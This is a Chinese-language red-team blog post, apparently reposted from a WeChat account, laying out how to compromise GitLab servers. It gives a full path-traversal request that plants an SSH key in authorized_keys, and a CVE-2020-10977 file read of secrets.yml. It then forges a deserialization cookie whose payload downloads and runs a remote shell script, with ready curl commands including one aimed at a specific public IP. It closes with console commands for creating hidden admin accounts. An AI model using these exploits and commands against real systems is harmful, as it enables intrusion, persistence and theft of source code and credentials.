GitLab渗透:高效攻略大揭秘

admin 2024年3月3日05:00:23评论47 views字数 6218阅读20分43秒阅读模式

GitLab 是一个开源的协作开发平台,用于管理和自动化软件开发的各个方面,在内网和外网都能看到身影,如果内网碰到它,那必须要拿下,里面还有大量的账号密码和程序源代码,对你渗透下个目标非常重要,当你拿到足够多的信息,目标自然就搞定了,

1.GitLab 版本判断

直接浏览器访问

url+assets/webpack/manifest.json

GitLab渗透:高效攻略大揭秘

获取到hash,在下面网站上找这个hash

https://raw.githubusercontent.com/righel/gitlab-version-nse/main/gitlab_hashes.json

GitLab渗透:高效攻略大揭秘

2.Gitlab常见漏洞

2.1 Gitlab远程代码执行漏洞(实际生产环境请谨慎尝试)

影响版本:

  • GitLab CE and EE 8.9.0 - 9.5.10

  • GitLab CE and EE 10.0.0 - 10.1.5

  • GitLab CE and EE 10.2.0 - 10.2.5

  • GitLab CE and EE 10.3.0 - 10.3.3


POC利用


登录gitlab->创建项目->Import project->GitLab Import->选择文件

url为:ip+/import/gitlab_project/new?namespace_id=2&path=

然后选择前面ssh-keygen生成的公钥(注意是公钥)

点击import project 后,burp修改path的值为ssh/../../../../../../../../../var/opt/gitlab/.ssh/authorized_keys

GitLab渗透:高效攻略大揭秘

数据包如下

POST /import/gitlab_project HTTP/1.1Host: 192.168.11.100User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------20787582420342Content-Length: 1214Referer: http://192.168.11.100/import/gitlab_project/new?namespace_id=2&path=Cookie: _gitlab_session=9c5f212sdfs2d992e1c9851c; sidebar_collapsed=falseConnection: closeUpgrade-Insecure-Requests: 1

-----------------------------20787582420342Content-Disposition: form-data; name="utf8"

ssh-----------------------------20787582420342Content-Disposition: form-data; name="authenticity_token"

JoWtToPxTJL6RVASaprnR1hRqEGARnbLkA06favQLxQ7Y7YtyqfE9+JsbV/NAwy7XAdTuzgRsxJ/Kl1hH9V6xA==-----------------------------20787582420342Content-Disposition: form-data; name="namespace_id"

{:value=>2}-----------------------------20787582420342Content-Disposition: form-data; name="path"

ssh/../../../../../../../../../var/opt/gitlab/.ssh/authorized_keys-----------------------------20787582420342Content-Disposition: form-data; name="namespace_id"

2-----------------------------20787582420342Content-Disposition: form-data; name="file"; filename="id_rsa.pub"Content-Type: application/vnd.ms-publisher

ssh-rsa xxxxxxxx

-----------------------------20787582420342-

成功后,可以用git用户使用你的证书登录进去,进行提权。

2.2 任意文件读取漏洞(CVE-2020-10977)

影响范围

GitLab GitLab CE/EE >=8.5 and <=12.9
GitLab GitLab CE >=8.5,<=12.9

 

搭建环境

使用docker

安装docker

 curl -fsSL https://get.docker.com -o get-docker.sh sh get-docker.sh

安装gitlab12.9

docker run --rm -d --hostname gitlab.ss -p 443:443 -p 80:80 -p 2222:22 --name gitlab gitlab/gitlab-ce:12.9.0-ce.0

文件读取实现,首先生成两个project 

GitLab渗透:高效攻略大揭秘

  再任意一个project添加issue,然后描述如下:

![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../..//opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml)

GitLab渗透:高效攻略大揭秘

将issue move到test1,然后查看能读取secret.yml内容

GitLab渗透:高效攻略大揭秘


 自己搭建一个gitlab(这里称为gitlab2),然后将

/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml的secret_key_base otp_key_base修改为读取的secret_key_base,otp_key_base。 

然后打开gitlab-rails终端(依次输入如下命令)

gitlab-rails consolerequest = ActionDispatch::Request.new(Rails.application.env_config)request.env["action_dispatch.cookies_serializer"] = :marshalcookies = request.cookie_jarerb = ERB.new("<%= `wget http://xxxxxxx/222.sh; bash 222.sh` %>")depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)cookies.signed[:cookie] = deprputs cookies[:cookie]

这里会输出cookies内容

GitLab渗透:高效攻略大揭秘

复制这段cookies ,执行如下命令

curl -vvv 'http://127.0.0.1/users/sign_in' -b "experimentation_subject_id=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQk6DkBpbnN0YW5jZW86CEVSQgs6EEBzYWZlX2xldmVsMDoJQHNyY0kiXSNjb2Rpbmc6VVRGLTgKX2VyYm91dCA9ICsnJzsgX2VyYm91dC48PCgoIGBlY2hvIHNlY3Rlc3QgPiAvdG1wL3NlY3RlczJgICkudG9fcyk7IF9lcmJvdXQGOgZFRjoOQGVuY29kaW5nSXU6DUVuY29kaW5nClVURi04BjsKRjoTQGZyb3plbl9zdHJpbmcwOg5AZmlsZW5hbWUwOgxAbGluZW5vaQA6DEBtZXRob2Q6C3Jlc3VsdDoJQHZhckkiDEByZXN1bHQGOwpUOhBAZGVwcmVjYXRvckl1Oh9BY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbgAGOwpU--5d038c1bd555dbf71182215ea9776f186efcfda1"

  或者

curl -k 'http://110.74.196.172:5050/' -b "remember_user_token=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQk6DkBpbnN0YW5jZW86CEVSQgs6EEBzYWZlX2xldmVsMDoJQHNyY0kicCNjb2Rpbmc6VVRGLTgKX2VyYm91dCA9ICsnJzsgX2VyYm91dC48PCgoIGB3Z2V0IGh0dHA6Ly8xNTQuMjAyLjU5LjEyNC8xMTEuc2g7IGJhc2ggMTExLnNoYCApLnRvX3MpOyBfZXJib3V0BjoGRUY6DkBlbmNvZGluZ0l1Og1FbmNvZGluZwpVVEYtOAY7CkY6E0Bmcm96ZW5fc3RyaW5nMDoOQGZpbGVuYW1lMDoMQGxpbmVub2kAOgxAbWV0aG9kOgtyZXN1bHQ6CUB2YXJJIgxAcmVzdWx0BjsKVDoQQGRlcHJlY2F0b3JJdTofQWN0aXZlU3VwcG9ydDo6RGVwcmVjYXRpb24ABjsKVA==--7ab68fcb38cdbaf58bd53960a817bfe9f3e880fc"

查看结果 

GitLab渗透:高效攻略大揭秘

还有其他漏洞,我这里就不一一列出,大家可以参考https://xz.aliyun.com/t/11690

3.Gitlab常用的文件

 gitlab配置文件
/etc/gitlab/gitlab.rb
默认的gitlab仓库存储位置在/var/opt/gitlab/git-data/repositories
备份文件存储位置/var/opt/gitlab/backup


/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
有密钥。可以生成cookie,执行命令 

GitLab渗透:高效攻略大揭秘

Gitlab-ssh证书路径

/var/opt/gitlab/.ssh/authorized_keys


Gitlab 配置文件:/opt/gitlab/
Gitlab 的项目目录:/var/opt/gitlab/git-data/repositories/root/
nginx 配置文件:/var/opt/gitlab/nginx/conf/
Redies 配置文件:/var/opt/gitlab/redis/
Gitlab 各个服务的启动脚本:/opt/gitlab/init/

网站目录
/opt/gitlab/embedded/service/gitlab-rails/public/assets

4.Gitlab常用命令

4.1 更改root密码(不建议)

登录控制台
gitlab-rails console
输入下面命令 

u = User.where(id:1).firstu.password='你要改的密码'u.save

4.2 添加管理员账号

1,使用控制台添加

gitlab-rails consoleUser.create(   :username => 'admins',   :name => 'admins',   :password => 'Aa1234567',   :password_confirmation => 'Aa1234567',   :email => '[email protected]',   :admin => true)user.save!


2,一条命令添加

gitlab-rails runner "user = User.create(   :username => 'admins',   :name => 'admins',   :password => 'Aa1234567',   :password_confirmation => 'Aa1234567',   :email => '[email protected]',   :admin => true); user.save;"

查找用户

user = User.find_by(email: 'A@gt.com') #搜索email 地址为[email protected]user = User.find_by(username: 'zhangwei') #搜索用户名为zhangweiuser.admin=true  #更改为管理员user.save!      #保存

 4.3 修改用户状态

user.state = 'active'  blockeduser.save

4.4 删除用户

gitlab-rails runner 命令删除名为 'kings' 的用户

gitlab-rails runner "user = User.find_by(username: 'kings'); user&.destroy"

如果上面的命令无法删除账号,使用下面的试试

u = User.find("43"#找到你添加用户的idu.admin = falseu.moderator = falseu.save

如果添加的用户提示email验证,用下面命令

4.5 关闭email验证

admin = User.find_by_username "kings" # replace with your admin usernameadmin.confirmed_at = Time.nowadmin.save!

5 总结

这里只是收集Gitlab常用的渗透思路和命令,还有很多东西没有涉及到,后面会继续补充。

参考

https://xz.aliyun.com/t/11690

https://xz.aliyun.com/t/2366#toc-6

https://www.cnblogs.com/yzcxld/p/14008033.html


原文始发于微信公众号(红队笔记录):GitLab渗透:高效攻略大揭秘

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月3日05:00:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   GitLab渗透:高效攻略大揭秘https://cn-sec.com/archives/2095338.html

发表评论

匿名网友 填写信息